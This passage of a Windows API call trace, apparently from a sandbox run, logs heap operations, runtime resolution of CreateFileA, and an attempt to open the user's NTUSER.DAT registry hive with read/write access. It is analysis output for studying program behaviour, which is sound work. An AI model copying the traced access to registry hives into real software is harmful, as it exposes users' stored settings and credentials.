hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0039.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8891f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.199] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0039.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x29) returned 0x7b45c8 [0039.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", cchWideChar=41, lpMultiByteStr=0x7b45c8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpUsedDefaultChar=0x0) returned 41 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.200] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x52) returned 0x794b90 [0039.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=41, lpWideCharStr=0x794b90, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 41 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.203] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.204] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.205] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.206] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.206] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.206] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.207] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.207] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.207] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.207] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c9a0 [0039.207] 